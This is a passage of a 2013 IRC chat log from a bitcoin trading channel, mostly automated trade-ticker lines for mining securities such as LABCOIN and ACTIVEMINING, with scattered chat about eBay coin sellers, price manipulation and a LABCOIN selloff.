same thing before taking on paypal. wondering if theyre looking into using btc. Sep 13 23:28:37 did you know that an ebay worker called bitcoin sellers? Sep 13 23:28:55 he is some policy maker guy and asked for their experience Sep 13 23:29:20 Rawted usg. Sep 13 23:29:25 but i assume that is to create guidelines about coin selling on ebay Sep 13 23:33:11 mircea_popescu, ? Sep 13 23:33:22 user generated content. Sep 13 23:33:33 [dumb stupid shit the cat threw up] Sep 13 23:34:02 gotcha Sep 13 23:36:04 tell dad to keep sticking it to the man resses Sep 13 23:38:42 yeah, reeses, my best wishes for your pops. Sep 13 23:39:26 thanks. fortunately, on this one, I can actually donate blood to someone rather than being rejected. :-) Sep 13 23:42:35 [BTCTC] [TAT.ASICMINER] 48 @ 0.0206 = 0.9888 BTC [-] Sep 13 23:44:22 [BTCTC] [ACTIVEMINING] 392 @ 0.003008 = 1.1791 BTC [-] Sep 13 23:44:23 [BTCTC] [ACTIVEMINING] 121 @ 0.003011 = 0.3643 BTC [+] Sep 13 23:44:25 [BTCTC] [ACTIVEMINING] 487 @ 0.00304 = 1.4805 BTC [+] Sep 13 23:44:55 [BTCTC] [TAT.ASICMINER] 11 @ 0.02051 = 0.2256 BTC [-] Sep 13 23:46:01 tough road ahead man, all my best. Sep 13 23:47:03 [BTCTC] [LABCOIN] 100 @ 0.003479 = 0.3479 BTC [-] Sep 13 23:47:04 [BTCTC] [LABCOIN] 1900 @ 0.00348 = 6.612 BTC [+] Sep 13 23:47:12 [BTCTC] [DMS.MINING] 1 @ 0.002659 BTC [-] Sep 13 23:48:45 [BTCTC] [LABCOIN] 880 @ 0.00348 = 3.0624 BTC [+] Sep 13 23:51:43 [BTCTC] [LABCOIN] 12 @ 0.00348 = 0.0418 BTC [+] Sep 13 23:55:11 http://falkvinge.net/2013/09/13/bitcoins-vast-overvaluation-seems-to-be-caused-by-usually-illegal-price-fixing/ Sep 13 23:55:37 [BTCTC] [LABCOIN] 17 @ 0.003456 = 0.0588 BTC [-] Sep 13 23:55:37 [BTCTC] [LABCOIN] 233 @ 0.00343 = 0.7992 BTC [-] Sep 13 23:55:50 [MPEX] [S.MPOE] 12800 @ 0.00089578 = 11.466 BTC [-] Sep 13 23:55:51 Out of these, a staggering 2 million bitcoin are gambled every year on the SatoshiDice site alone, and another, PrimeDice, 1.5 million. Sep 13 23:55:54 what? Sep 13 23:56:57 some people pass air through their buttholes then flap their cheeks around to make strange noises Sep 13 23:57:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.02051 = 0.1026 BTC [-] Sep 13 23:59:36 guess he forgot hardware sales and securities Sep 14 00:01:15 and he should do not just "per every year" but rather "per decade" bitcoin stats Sep 14 00:04:06 he's right about the manipulation, but he claims insider trading (though he hasn't show it's more than one actor) Sep 14 00:06:14 [BTCTC] [ACTIVEMINING] 1 @ 0.002904 BTC [-] Sep 14 00:06:16 [BTCTC] [ACTIVEMINING] 10 @ 0.002903 = 0.029 BTC [-] Sep 14 00:06:17 [BTCTC] [ACTIVEMINING] 1 @ 0.002888 BTC [-] Sep 14 00:06:18 [BTCTC] [ACTIVEMINING] 7 @ 0.002887 = 0.0202 BTC [-] Sep 14 00:06:19 [BTCTC] [ACTIVEMINING] 224 @ 0.002843 = 0.6368 BTC [-] Sep 14 00:06:21 [BTCTC] [ACTIVEMINING] 56 @ 0.00284 = 0.159 BTC [-] Sep 14 00:06:34 [BTCTC] [ACTIVEMINING] 2 @ 0.002809 = 0.0056 BTC [-] Sep 14 00:06:36 [BTCTC] [ACTIVEMINING] 10 @ 0.002808 = 0.0281 BTC [-] Sep 14 00:06:37 [BTCTC] [ACTIVEMINING] 1 @ 0.002806 BTC [-] Sep 14 00:06:38 [BTCTC] [ACTIVEMINING] 5 @ 0.002805 = 0.014 BTC [-] Sep 14 00:06:38 [BTCTC] [ACTIVEMINING] 2 @ 0.002799 = 0.0056 BTC [-] Sep 14 00:06:40 [BTCTC] [ACTIVEMINING] 10 @ 0.002798 = 0.028 BTC [-] Sep 14 00:06:41 [BTCTC] [ACTIVEMINING] 1761 @ 0.002792 = 4.9167 BTC [-] Sep 14 00:06:42 [BTCTC] [ACTIVEMINING] 57 @ 0.002791 = 0.1591 BTC [-] Sep 14 00:06:48 [BTCTC] [DMS.MINING] 1 @ 0.002655 BTC [-] Sep 14 00:07:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.02051 BTC [-] Sep 14 00:09:34 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00065 = 0.0013 BTC [-] Sep 14 00:10:55 wonder his 'shark squad' isn't just the new mt gox Midas engine :P Sep 14 00:13:00 [MPEX] [S.MPOE] 3250 @ 0.00089578 = 2.9113 BTC [-] Sep 14 00:13:02 [MPEX] [S.MPOE] 4254 @ 0.00089502 = 3.8074 BTC [-] Sep 14 00:13:06 [MPEX] [S.MPOE] 7233 @ 0.00089431 = 6.4685 BTC [-] Sep 14 00:17:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.0205 = 0.1025 BTC [-] Sep 14 00:17:50 [BTCTC] [LABCOIN] 67 @ 0.00343 = 0.2298 BTC [-] Sep 14 00:17:52 [BTCTC] [LABCOIN] 1 @ 0.00343 BTC [-] Sep 14 00:18:02 [HAVELOCK] [AM100] 5 @ 0.02109 = 0.1055 BTC [-] Sep 14 00:18:15 [BTCTC] [TAT.ASICMINER] 52 @ 0.02051 = 1.0665 BTC [+] Sep 14 00:20:16 [BTCTC] [BITVPS] 10 @ 0.002 = 0.02 BTC [+] Sep 14 00:22:31 [HAVELOCK] [VTX] 4 @ 0.59 = 2.36 BTC [+] Sep 14 00:23:30 [BTCTC] [LABCOIN] 1 @ 0.003363 BTC [-] Sep 14 00:23:53 [BTCTC] [LABCOIN] 6 @ 0.003363 = 0.0202 BTC [-] Sep 14 00:27:44 [BTCTC] [ACTIVEMINING] 1 @ 0.002954 BTC [+] Sep 14 00:32:06 [MPEX] [S.MPOE] 4808 @ 0.00089291 = 4.2931 BTC [-] Sep 14 00:34:14 opengamma? quantlib? experiences with either to share? Sep 14 00:35:34 [HAVELOCK] [CBTC] 1 @ 0.00042498 BTC [+] Sep 14 00:36:27 [BTCTC] [BTC-GOLD] 1 @ 0.0101 BTC [-] Sep 14 00:36:29 [BTCTC] [BTC-GOLD] 3 @ 0.01 = 0.03 BTC [-] Sep 14 00:36:30 [BTCTC] [BTC-GOLD] 98 @ 0.005046 = 0.4945 BTC [-] Sep 14 00:36:31 [BTCTC] [BTC-GOLD] 4 @ 0.005045 = 0.0202 BTC [-] Sep 14 00:39:34 [BTCTC] [PETA-MINE] 1 @ 0.6589 BTC [+] Sep 14 00:40:12 [BTCTC] [DMS.MINING] 2 @ 0.002654 = 0.0053 BTC [-] Sep 14 00:43:29 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00065 BTC [-] Sep 14 00:47:07 [BTCTC] [BTC-GOLD] 4 @ 0.005043 = 0.0202 BTC [-] Sep 14 00:47:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00065 BTC [-] Sep 14 00:48:09 [BTCTC] [DMS.MINING] 9 @ 0.002651 = 0.0239 BTC [-] Sep 14 00:49:04 [BTCTC] [LABCOIN] 5 @ 0.003429 = 0.0171 BTC [+] Sep 14 00:49:06 [BTCTC] [LABCOIN] 42 @ 0.00343 = 0.1441 BTC [+] Sep 14 00:49:07 [BTCTC] [LABCOIN] 2 @ 0.00346 = 0.0069 BTC [+] Sep 14 00:49:08 [BTCTC] [LABCOIN] 6 @ 0.003478 = 0.0209 BTC [+] Sep 14 00:49:09 [BTCTC] [LABCOIN] 945 @ 0.00348 = 3.2886 BTC [+] Sep 14 00:49:43 [BTCTC] [LABCOIN] 72 @ 0.00348 = 0.2506 BTC [+] Sep 14 00:50:31 [BTCTC] [LABCOIN] 25 @ 0.00348 = 0.087 BTC [+] Sep 14 01:10:20 [BTCTC] [BTC-GOLD] 4 @ 0.005005 = 0.02 BTC [-] Sep 14 01:11:57 [HAVELOCK] [CFIG] 10 @ 0.145 = 1.45 BTC [-] Sep 14 01:13:26 [MPEX] [S.MPOE] 3200 @ 0.00089791 = 2.8733 BTC [+] Sep 14 01:20:28 [BTCTC] [COGNITIVE] 4 @ 0.2805 = 1.122 BTC [+] Sep 14 01:20:29 [BTCTC] [COGNITIVE] 3 @ 0.2803 = 0.8409 BTC [-] Sep 14 01:20:31 [BTCTC] [COGNITIVE] 10 @ 0.28 = 2.8 BTC [-] Sep 14 01:31:30 [BTCTC] [TAT.ASICMINER] 45 @ 0.0205 = 0.9225 BTC [-] Sep 14 01:31:31 [BTCTC] [TAT.ASICMINER] 12 @ 0.0205 = 0.246 BTC [-] Sep 14 01:31:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.0205 = 0.0615 BTC [-] Sep 14 01:32:51 [BTCTC] [CIPHERMINE-PT] 19 @ 0.06375 = 1.2113 BTC [-] Sep 14 01:34:22 [HAVELOCK] [VTX] 3 @ 0.59 = 1.77 BTC [+] Sep 14 01:41:26 [BTCTC] [DMS.PURCHASE] 3 @ 0.01196 = 0.0359 BTC [-] Sep 14 01:43:01 [BTCTC] [LABCOIN] 1000 @ 0.003479 = 3.479 BTC [-] Sep 14 01:43:02 [BTCTC] [LABCOIN] 1015 @ 0.00348 = 3.5322 BTC [+] Sep 14 01:43:04 [BTCTC] [LABCOIN] 750 @ 0.003496 = 2.622 BTC [+] Sep 14 01:43:05 [BTCTC] [LABCOIN] 1000 @ 0.003496 = 3.496 BTC [+] Sep 14 01:43:05 [BTCTC] [LABCOIN] 4235 @ 0.003497 = 14.8098 BTC [+] Sep 14 01:44:27 [BTCTC] [DMS.SELLING] 2 @ 0.009401 = 0.0188 BTC [+] Sep 14 01:44:43 [BTCTC] [DMS.SELLING] 1 @ 0.0094 BTC [-] Sep 14 01:45:00 [BTCTC] [ACTIVEMINING] 9 @ 0.002932 = 0.0264 BTC [-] Sep 14 01:49:17 [BTCTC] [LABCOIN] 2000 @ 0.003497 = 6.994 BTC [+] Sep 14 01:51:05 [BTCTC] [BTC-GOLD] 1 @ 0.005043 BTC [+] Sep 14 01:55:29 [BTCTC] [LABCOIN] 840 @ 0.003497 = 2.9375 BTC [+] Sep 14 01:56:04 [BTCTC] [LABCOIN] 129 @ 0.003497 = 0.4511 BTC [+] Sep 14 01:56:47 [BTCTC] [ACTIVEMINING] 75 @ 0.002932 = 0.2199 BTC [-] Sep 14 01:57:03 [BTCTC] [ACTIVEMINING] 1 @ 0.002932 BTC [-] Sep 14 01:57:46 [BTCTC] [NASTY-PT] 1 @ 0.001856 BTC [-] Sep 14 01:58:28 coconut, ThickAsThieves, you can give it a go Sep 14 01:58:56 and tell me, satisfaction? Sep 14 02:00:58 [BTCTC] [DMS.MINING] 1 @ 0.002645 BTC [-] Sep 14 02:03:14 [BTCTC] [ACTIVEMINING] 10 @ 0.002932 = 0.0293 BTC [-] Sep 14 02:05:19 [BTCTC] [ACTIVEMINING] 17 @ 0.002932 = 0.0498 BTC [-] Sep 14 02:06:54 [BTCTC] [ACTIVEMINING] 1 @ 0.002932 BTC [-] Sep 14 02:07:11 [BTCTC] [ACTIVEMINING] 2 @ 0.002932 = 0.0059 BTC [-] Sep 14 02:07:33 [BTCTC] [ACTIVEMINING] 3 @ 0.002932 = 0.0088 BTC [-] Sep 14 02:07:58 [BTCTC] [ACTIVEMINING] 4 @ 0.002932 = 0.0117 BTC [-] Sep 14 02:08:12 [BTCTC] [LABCOIN] 120 @ 0.003497 = 0.4196 BTC [+] Sep 14 02:08:15 [BTCTC] [ACTIVEMINING] 5 @ 0.002932 = 0.0147 BTC [-] Sep 14 02:08:24 [BTCTC] [LABCOIN] 50 @ 0.003497 = 0.1749 BTC [+] Sep 14 02:08:37 [BTCTC] [ACTIVEMINING] 6 @ 0.002932 = 0.0176 BTC [-] Sep 14 02:08:52 [BTCTC] [ACTIVEMINING] 7 @ 0.002932 = 0.0205 BTC [-] Sep 14 02:09:08 [BTCTC] [CIPHERMINE.B1] 1 @ 0.01048 BTC [+] Sep 14 02:09:11 [BTCTC] [ACTIVEMINING] 8 @ 0.002932 = 0.0235 BTC [-] Sep 14 02:09:28 [BTCTC] [ACTIVEMINING] 9 @ 0.002932 = 0.0264 BTC [-] Sep 14 02:09:51 [BTCTC] [ACTIVEMINING] 10 @ 0.002932 = 0.0293 BTC [-] Sep 14 02:10:05 [BTCTC] [ACTIVEMINING] 11 @ 0.002932 = 0.0323 BTC [-] Sep 14 02:10:24 [BTCTC] [ACTIVEMINING] 1 @ 0.002932 BTC [-] Sep 14 02:10:27 [BTCTC] [ACTIVEMINING] 12 @ 0.002932 = 0.0352 BTC [-] Sep 14 02:10:48 [BTCTC] [ACTIVEMINING] 13 @ 0.002932 = 0.0381 BTC [-] Sep 14 02:11:03 [BTCTC] [ACTIVEMINING] 14 @ 0.002932 = 0.041 BTC [-] Sep 14 02:11:31 [BTCTC] [ACTIVEMINING] 15 @ 0.002932 = 0.044 BTC [-] Sep 14 02:12:02 [BTCTC] [ACTIVEMINING] 16 @ 0.002932 = 0.0469 BTC [-] Sep 14 02:14:10 neat, there is a calculator now on bitbet Sep 14 02:14:19 mhm Sep 14 02:16:41 http://www.youtube.com/watch?v=z-sdO6pwVHQ Sep 14 02:16:43 Help Kickstart World War III - YouTube Sep 14 02:17:32 [BTCTC] [LABCOIN] 6 @ 0.003497 = 0.021 BTC [+] Sep 14 02:18:44 "america is dead ass broke. so our goal is to raise 1.6 trillion dollars" this video is great Sep 14 02:19:00 [BTCTC] [CIPHERMINE-PT] 2 @ 0.06235 = 0.1247 BTC [-] Sep 14 02:19:32 That is an awesome video. Sep 14 02:19:52 [BTCTC] [LABCOIN] 738 @ 0.003497 = 2.5808 BTC [+] Sep 14 02:20:04 [BTCTC] [LABCOIN] 6 @ 0.003497 = 0.021 BTC [+] Sep 14 02:20:53 man fuck weexchange Sep 14 02:20:56 takin so long Sep 14 02:20:57 Troubles? Sep 14 02:21:04 Yeah. That's just waiting for 6 confs man. Sep 14 02:21:14 i meant to transfer it to btct but for some reason i didnt think and just sent it to my weexchange Sep 14 02:21:28 woops :P Sep 14 02:21:32 it kills me, but o well. Sep 14 02:21:50 Are you watching the tx? Sep 14 02:22:06 oh, ouch. Sep 14 02:22:20 nah its cool, it usually takes 45 min to an hour Sep 14 02:22:22 i think Sep 14 02:22:44 http://www.huffingtonpost.com/2013/09/13/john-mccain-column-pravda_n_3922619.html Sep 14 02:22:48 John McCain To Attack Vladimir Putin With Column In Pravda Sep 14 02:23:05 should bitbet on how hard this fails, hard to very hard Sep 14 02:23:55 [BTCTC] [ACTIVEMINING] 1 @ 0.002848 BTC [-] Sep 14 02:23:57 [BTCTC] [ACTIVEMINING] 197 @ 0.002794 = 0.5504 BTC [-] Sep 14 02:23:58 [BTCTC] [ACTIVEMINING] 5 @ 0.002793 = 0.014 BTC [-] Sep 14 02:23:59 [BTCTC] [ACTIVEMINING] 10 @ 0.002792 = 0.0279 BTC [-] Sep 14 02:24:00 [BTCTC] [ACTIVEMINING] 426 @ 0.002792 = 1.1894 BTC [-] Sep 14 02:24:01 [BTCTC] [ACTIVEMINING] 1490 @ 0.002791 = 4.1586 BTC [-] Sep 14 02:24:02 [BTCTC] [ACTIVEMINING] 6 @ 0.002791 = 0.0167 BTC [-] Sep 14 02:25:16 [BTCTC] [ACTIVEMINING] 172 @ 0.002793 = 0.4804 BTC [+] Sep 14 02:25:34 [BTCTC] [ACTIVEMINING] 151 @ 0.002793 = 0.4217 BTC [+] Sep 14 02:25:35 [BTCTC] [ACTIVEMINING] 377 @ 0.00279 = 1.0518 BTC [-] Sep 14 02:25:48 [BTCTC] [LABCOIN] 876 @ 0.003497 = 3.0634 BTC [+] Sep 14 02:26:46 [BTCTC] [LABCOIN] 554 @ 0.003501 = 1.9396 BTC [+] Sep 14 02:27:05 [MPEX] [S.MPOE] 2337 @ 0.00089725 = 2.0969 BTC [-] Sep 14 02:27:40 [BTCTC] [LABCOIN] 1446 @ 0.003501 = 5.0624 BTC [+] Sep 14 02:28:45 [BTCTC] [LABCOIN] 32 @ 0.003532 = 0.113 BTC [+] Sep 14 02:28:46 [BTCTC] [LABCOIN] 500 @ 0.003534 = 1.767 BTC [+] Sep 14 02:28:47 [BTCTC] [LABCOIN] 2268 @ 0.003535 = 8.0174 BTC [+] Sep 14 02:29:09 https://bitcointalk.org/index.php?topic=170332.msg3147804#msg3147804what is the girl up to? Sep 14 02:29:13 https://bitcointalk.org/index.php?topic=170332.msg3147804#msg3147804 what is the girl up to? Sep 14 02:29:14 Swedish ASIC miner company kncminer.com Sep 14 02:29:19 Swedish ASIC miner company kncminer.com Sep 14 02:29:29 ^ mircea_popescu Sep 14 02:31:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02051 BTC [+] Sep 14 02:35:06 [MPEX] [S.MPOE] 2309 @ 0.00089791 = 2.0733 BTC [+] Sep 14 02:35:08 [MPEX] [S.MPOE] 4229 @ 0.00090302 = 3.8189 BTC [+] Sep 14 02:35:09 [MPEX] [S.MPOE] 1612 @ 0.00090342 = 1.4563 BTC [+] Sep 14 02:37:06 [BTCTC] [LABCOIN] 157 @ 0.003535 = 0.555 BTC [+] Sep 14 02:37:36 [BTCTC] [LABCOIN] 250 @ 0.003535 = 0.8838 BTC [+] Sep 14 02:41:00 [BTCTC] [LABCOIN] 500 @ 0.003535 = 1.7675 BTC [+] Sep 14 02:41:10 [BTCTC] [NASTY-PT] 1 @ 0.001856 BTC [-] Sep 14 02:42:50 [BTCTC] [LABCOIN] 10 @ 0.00353 = 0.0353 BTC [-] Sep 14 02:43:45 [BTCTC] [LABCOIN] 124 @ 0.003497 = 0.4336 BTC [-] Sep 14 02:44:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.02051 = 0.0615 BTC [+] Sep 14 02:45:30 [BTCTC] [LABCOIN] 400 @ 0.003534 = 1.4136 BTC [+] Sep 14 02:52:35 [BTCTC] [TAT.ASICMINER] 27 @ 0.0205 = 0.5535 BTC [-] Sep 14 02:52:59 [BTCTC] [LABCOIN] 600 @ 0.003534 = 2.1204 BTC [+] Sep 14 02:53:01 [BTCTC] [LABCOIN] 349 @ 0.003534 = 1.2334 BTC [+] Sep 14 02:53:01 [BTCTC] [LABCOIN] 170 @ 0.003534 = 0.6008 BTC [+] Sep 14 02:55:16 [BTCTC] [LABCOIN] 696 @ 0.003534 = 2.4597 BTC [+] Sep 14 02:55:18 [BTCTC] [LABCOIN] 5150 @ 0.003535 = 18.2053 BTC [+] Sep 14 02:55:19 [BTCTC] [LABCOIN] 1070 @ 0.003536 = 3.7835 BTC [+] Sep 14 02:55:20 [BTCTC] [LABCOIN] 616 @ 0.003537 = 2.1788 BTC [+] Sep 14 02:55:21 [BTCTC] [LABCOIN] 2000 @ 0.003538 = 7.076 BTC [+] Sep 14 02:55:22 [BTCTC] [LABCOIN] 1000 @ 0.00354 = 3.54 BTC [+] Sep 14 02:55:23 [BTCTC] [LABCOIN] 100 @ 0.003543 = 0.3543 BTC [+] Sep 14 02:55:25 [BTCTC] [LABCOIN] 200 @ 0.003547 = 0.7094 BTC [+] Sep 14 02:55:26 [BTCTC] [LABCOIN] 1619 @ 0.003548 = 5.7442 BTC [+] Sep 14 02:57:00 [BTCTC] [LABCOIN] 72 @ 0.003548 = 0.2555 BTC [+] Sep 14 03:00:41 [BTCTC] [LABCOIN] 809 @ 0.003548 = 2.8703 BTC [+] Sep 14 03:01:03 [BTCTC] [LABCOIN] 1000 @ 0.003549 = 3.549 BTC [+] Sep 14 03:04:25 [BTCTC] [CIPHERMINE.B1] 40 @ 0.01049 = 0.4196 BTC [+] Sep 14 03:05:19 [BTCTC] [DMS.MINING] 40 @ 0.002645 = 0.1058 BTC [-] Sep 14 03:06:53 [BTCTC] [FIMB] 40 @ 0.01099 = 0.4396 BTC [+] Sep 14 03:09:05 [BTCTC] [BTC-GOLD] 9 @ 0.005043 = 0.0454 BTC [+] Sep 14 03:09:33 [BTCTC] [LABCOIN] 1000 @ 0.003549 = 3.549 BTC [+] Sep 14 03:10:30 [BTCTC] [LABCOIN] 1520 @ 0.0035 = 5.32 BTC [-] Sep 14 03:13:56 [BTCTC] [TAT.ASICMINER] 11 @ 0.02051 = 0.2256 BTC [+] Sep 14 03:18:01 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Sep 14 03:25:54 [BTCTC] [LABCOIN] 86 @ 0.003549 = 0.3052 BTC [+] Sep 14 03:28:36 [BTCTC] [ACTIVEMINING] 1 @ 0.002925 BTC [+] Sep 14 03:28:53 [BTCTC] [LABCOIN] 914 @ 0.003549 = 3.2438 BTC [+] Sep 14 03:34:56 [HAVELOCK] [VTX] 6 @ 0.6049999 = 3.63 BTC [+] Sep 14 03:34:58 [HAVELOCK] [VTX] 10 @ 0.605 = 6.05 BTC [+] Sep 14 03:36:59 [BTCTC] [LABCOIN] 1 @ 0.003549 BTC [+] Sep 14 03:39:09 [HAVELOCK] [AM100] 46 @ 0.02109 = 0.9701 BTC [-] Sep 14 03:46:07 [MPEX] [S.MPOE] 2650 @ 0.00090342 = 2.3941 BTC [+] Sep 14 03:48:21 [BTCTC] [LABCOIN] 57 @ 0.003548 = 0.2022 BTC [-] Sep 14 03:48:23 [BTCTC] [LABCOIN] 793 @ 0.003548 = 2.8136 BTC [-] Sep 14 03:53:22 lol https://bitcointalk.org/index.php?topic=263445.msg3148618#msg3148618 Sep 14 03:54:44 [BTCTC] [ACTIVEMINING] 10 @ 0.002944 = 0.0294 BTC [+] Sep 14 04:00:02 [BTCTC] [ASICMINER-PT] 16 @ 2.165 = 34.64 BTC [-] Sep 14 04:01:51 [MPEX] [S.MPOE] 6600 @ 0.00089853 = 5.9303 BTC [-] Sep 14 04:02:57 [BTCTC] [LABCOIN] 5 @ 0.00342 = 0.0171 BTC [-] Sep 14 04:02:58 [BTCTC] [LABCOIN] 100 @ 0.003417 = 0.3417 BTC [-] Sep 14 04:03:00 [BTCTC] [LABCOIN] 275 @ 0.003412 = 0.9383 BTC [-] Sep 14 04:03:01 [BTCTC] [LABCOIN] 56 @ 0.003398 = 0.1903 BTC [-] Sep 14 04:03:01 [BTCTC] [LABCOIN] 1 @ 0.003397 BTC [-] Sep 14 04:03:02 [BTCTC] [LABCOIN] 568 @ 0.003389 = 1.925 BTC [-] Sep 14 04:03:03 [BTCTC] [LABCOIN] 5 @ 0.003385 = 0.0169 BTC [-] Sep 14 04:03:04 [BTCTC] [LABCOIN] 50 @ 0.003384 = 0.1692 BTC [-] Sep 14 04:03:06 [BTCTC] [LABCOIN] 9 @ 0.003378 = 0.0304 BTC [-] Sep 14 04:03:07 [BTCTC] [LABCOIN] 97 @ 0.003377 = 0.3276 BTC [-] Sep 14 04:03:08 [BTCTC] [LABCOIN] 9 @ 0.003352 = 0.0302 BTC [-] Sep 14 04:03:09 [BTCTC] [LABCOIN] 98 @ 0.003351 = 0.3284 BTC [-] Sep 14 04:03:10 [BTCTC] [LABCOIN] 40 @ 0.003341 = 0.1336 BTC [-] Sep 14 04:03:11 [BTCTC] [LABCOIN] 400 @ 0.00334 = 1.336 BTC [-] Sep 14 04:03:11 [BTCTC] [LABCOIN] 300 @ 0.003339 = 1.0017 BTC [-] Sep 14 04:03:12 [BTCTC] [LABCOIN] 1000 @ 0.003338 = 3.338 BTC [-] Sep 14 04:03:13 [BTCTC] [LABCOIN] 2000 @ 0.003336 = 6.672 BTC [-] Sep 14 04:03:14 [BTCTC] [LABCOIN] 1 @ 0.003331 BTC [-] Sep 14 04:03:15 [BTCTC] [LABCOIN] 17 @ 0.00333 = 0.0566 BTC [-] Sep 14 04:03:16 [BTCTC] [LABCOIN] 9 @ 0.003326 = 0.0299 BTC [-] Sep 14 04:03:17 [BTCTC] [LABCOIN] 96 @ 0.003325 = 0.3192 BTC [-] Sep 14 04:03:18 [BTCTC] [LABCOIN] 1 @ 0.003302 BTC [-] Sep 14 04:03:20 [BTCTC] [LABCOIN] 9 @ 0.0033 = 0.0297 BTC [-] Sep 14 04:03:21 [BTCTC] [LABCOIN] 97 @ 0.003299 = 0.32 BTC [-] Sep 14 04:03:22 [BTCTC] [LABCOIN] 4559 @ 0.003283 = 14.9672 BTC [-] Sep 14 04:03:22 [BTCTC] [LABCOIN] 198 @ 0.003282 = 0.6498 BTC [-] Sep 14 04:04:04 [BTCTC] [LABCOIN] 459 @ 0.003287 = 1.5087 BTC [+] Sep 14 04:04:06 [BTCTC] [LABCOIN] 56 @ 0.003285 = 0.184 BTC [-] Sep 14 04:04:07 [BTCTC] [LABCOIN] 9 @ 0.003274 = 0.0295 BTC [-] Sep 14 04:04:09 [BTCTC] [LABCOIN] 96 @ 0.003273 = 0.3142 BTC [-] Sep 14 04:04:10 [BTCTC] [LABCOIN] 50 @ 0.003253 = 0.1627 BTC [-] Sep 14 04:04:11 [BTCTC] [LABCOIN] 9 @ 0.003248 = 0.0292 BTC [-] Sep 14 04:04:12 [BTCTC] [LABCOIN] 96 @ 0.003247 = 0.3117 BTC [-] Sep 14 04:04:13 [BTCTC] [LABCOIN] 849 @ 0.003223 = 2.7363 BTC [-] Sep 14 04:04:15 [BTCTC] [LABCOIN] 2220 @ 0.003222 = 7.1528 BTC [-] Sep 14 04:04:16 [BTCTC] [LABCOIN] 4900 @ 0.003222 = 15.7878 BTC [-] Sep 14 04:04:16 [BTCTC] [LABCOIN] 96 @ 0.003221 = 0.3092 BTC [-] Sep 14 04:04:17 [BTCTC] [LABCOIN] 1274 @ 0.00322 = 4.1023 BTC [-] Sep 14 04:04:18 [BTCTC] [LABCOIN] 10 @ 0.003209 = 0.0321 BTC [-] Sep 14 04:04:19 [BTCTC] [LABCOIN] 100 @ 0.003208 = 0.3208 BTC [-] Sep 14 04:04:20 [BTCTC] [LABCOIN] 340 @ 0.003201 = 1.0883 BTC [-] Sep 14 04:04:21 [BTCTC] [LABCOIN] 3400 @ 0.0032 = 10.88 BTC [-] Sep 14 04:04:22 [BTCTC] [LABCOIN] 10 @ 0.003197 = 0.032 BTC [-] Sep 14 04:04:24 [BTCTC] [LABCOIN] 100 @ 0.003196 = 0.3196 BTC [-] Sep 14 04:04:25 [BTCTC] [LABCOIN] 9 @ 0.003171 = 0.0285 BTC [-] Sep 14 04:04:26 [BTCTC] [LABCOIN] 95 @ 0.00317 = 0.3012 BTC [-] Sep 14 04:04:26 [BTCTC] [LABCOIN] 22 @ 0.00316 = 0.0695 BTC [-] Sep 14 04:04:27 [BTCTC] [LABCOIN] 280 @ 0.003159 = 0.8845 BTC [-] Sep 14 04:04:28 [BTCTC] [LABCOIN] 500 @ 0.003157 = 1.5785 BTC [-] Sep 14 04:04:29 [BTCTC] [LABCOIN] 1404 @ 0.003155 = 4.4296 BTC [-] Sep 14 04:04:33 [BTCTC] [LABCOIN] 10 @ 0.003286 = 0.0329 BTC [+] Sep 14 04:04:34 [BTCTC] [LABCOIN] 500 @ 0.003224 = 1.612 BTC [-] Sep 14 04:04:36 [BTCTC] [LABCOIN] 407 @ 0.003157 = 1.2849 BTC [-] Sep 14 04:04:37 [BTCTC] [LABCOIN] 1196 @ 0.003155 = 3.7734 BTC [-] Sep 14 04:04:38 [BTCTC] [LABCOIN] 96 @ 0.003144 = 0.3018 BTC [-] Sep 14 04:04:39 [BTCTC] [LABCOIN] 502 @ 0.00314 = 1.5763 BTC [-] Sep 14 04:04:41 [BTCTC] [LABCOIN] 2314 @ 0.00312 = 7.2197 BTC [-] Sep 14 04:04:41 [BTCTC] [LABCOIN] 97 @ 0.003118 = 0.3024 BTC [-] Sep 14 04:04:42 [BTCTC] [LABCOIN] 2400 @ 0.003109 = 7.4616 BTC [-] Sep 14 04:04:42 SELLLSELLLSELLL Sep 14 04:04:43 [BTCTC] [LABCOIN] 100 @ 0.003109 = 0.3109 BTC [-] Sep 14 04:04:44 [BTCTC] [LABCOIN] 150 @ 0.0031 = 0.465 BTC [-] Sep 14 04:04:45 [BTCTC] [LABCOIN] 4684 @ 0.0031 = 14.5204 BTC [-] Sep 14 04:04:46 [BTCTC] [LABCOIN] 95 @ 0.003092 = 0.2937 BTC [-] Sep 14 04:04:47 [BTCTC] [LABCOIN] 3800 @ 0.003081 = 11.7078 BTC [-] Sep 14 04:04:48 [BTCTC] [LABCOIN] 3659 @ 0.003081 = 11.2734 BTC [-] Sep 14 04:04:49 [BTCTC] [LABCOIN] 500 @ 0.00305 = 1.525 BTC [-] Sep 14 04:04:49 [BTCTC] [LABCOIN] 500 @ 0.00305 = 1.525 BTC [-] Sep 14 04:04:50 [BTCTC] [LABCOIN] 75 @ 0.003018 = 0.2264 BTC [-] Sep 14 04:04:51 [BTCTC] [LABCOIN] 1154 @ 0.00301 = 3.4735 BTC [-] Sep 14 04:04:52 [BTCTC] [LABCOIN] 2600 @ 0.003009 = 7.8234 BTC [-] Sep 14 04:04:53 [BTCTC] [LABCOIN] 4200 @ 0.003004 = 12.6168 BTC [-] Sep 14 04:04:54 [BTCTC] [LABCOIN] 10000 @ 0.003003 = 30.03 BTC [-] Sep 14 04:04:55 [BTCTC] [LABCOIN] 1108 @ 0.003002 = 3.3262 BTC [-] Sep 14 04:04:56 [BTCTC] [LABCOIN] 1000 @ 0.003001 = 3.001 BTC [-] Sep 14 04:04:58 [BTCTC] [LABCOIN] 5800 @ 0.003001 = 17.4058 BTC [-] Sep 14 04:04:59 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [-] Sep 14 04:04:59 [BTCTC] [LABCOIN] 9854 @ 0.003 = 29.562 BTC [-] Sep 14 04:05:00 [BTCTC] [LABCOIN] 55 @ 0.003 = 0.165 BTC [-] Sep 14 04:05:01 [BTCTC] [LABCOIN] 5000 @ 0.003 = 15 BTC [-] Sep 14 04:05:02 